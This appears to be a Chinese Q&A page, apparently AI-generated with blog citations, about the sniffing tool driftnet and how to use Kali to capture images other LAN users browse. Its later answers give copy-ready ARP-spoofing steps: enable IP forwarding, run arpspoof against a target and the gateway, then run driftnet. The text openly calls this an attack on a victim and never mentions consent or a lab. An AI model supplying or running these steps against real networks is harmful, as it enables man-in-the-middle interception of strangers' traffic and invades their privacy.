driftnet截取不到图片
时间: 2023-06-15 07:07:56 浏览: 89
driftnet是一个基于网络嗅探的工具,可以截取网络数据并将其转换为图片。如果你在使用driftnet时无法截取到图片,可能有以下几个原因:
1.网络流量不足:driftnet需要足够的网络流量才能够截取到图片,如果网络流量很小,就可能无法截取到图片。
2.网络设备问题:driftnet需要在网络设备上运行,如果网络设备配置不正确或者有问题,也可能导致无法截取到图片。
3.网络协议问题:driftnet只能截取支持的协议(例如HTTP)中的图片,如果你想要截取其他协议中的图片,就需要使用其他的工具。
如果你确定以上几个问题都不是导致无法截取图片的原因,可以尝试使用其他类似的工具或者通过调整driftnet的配置来解决问题。
相关问题
kali获取同局域网设备的图片信息
回答: 在Kali中获取同局域网设备的图片信息,可以使用arpspoof和driftnet这两个工具来完成。首先,确保攻击者和被攻击者都在同一局域网段内。可以使用ifconfig命令查看当前IP所属的网段,并使用route -n命令查看当前网关。然后,使用fping -ags 192.168.1.0/24命令查看同局域网的IP,选择目标设备。接下来,使用echo 1 >/proc/sys/net/ipv4/ip_forward命令进行流量转发。然后,使用arpspoof -i wlan0 -t 网关 目标IP命令进行ARP攻击。最后,使用driftnet -i wlan0命令进行图片的获取。只需刷新目标设备的网页即可获取图片信息。\[3\]
#### 引用[.reference_title]
- *1* [使用kali对同一局域网内的设备进行断网和查看设备图片](https://blog.csdn.net/goddreamyyh/article/details/86299196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item]
- *2* [kali关于局域网的小操作](https://blog.csdn.net/qq_33694648/article/details/104341432)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item]
- *3* [kali获取同局域网设备的图片信息](https://blog.csdn.net/hackerie/article/details/79375271)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]
kali进行arp欺骗
以下是使用Kali进行ARP欺骗的步骤:
1. 确保Kali和目标主机在同一局域网中,并且IP地址已知。
2. 打开终端并输入以下命令来开启IP转发功能:
```
echo 1 > /proc/sys/net/ipv4/ip_forward
```
或者
```
sysctl -w net.ipv4.ip_forward=1
```
3. 使用arpspoof命令进行ARP欺骗攻击,命令格式如下:
```
arpspoof -i <interface> -t <target_ip> <gateway_ip>
```
其中,<interface>是你的网络接口名称,<target_ip>是目标主机的IP地址,<gateway_ip>是网关的IP地址。例如:
```
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
```
4. 打开另一个终端窗口,输入以下命令来启动driftnet工具:
```
driftnet -i <interface>
```
其中,<interface>是你的网络接口名称。例如:
```
driftnet -i eth0
```
5. 在目标主机上打开浏览器并浏览网页,driftnet将会捕获到目标主机浏览的图片。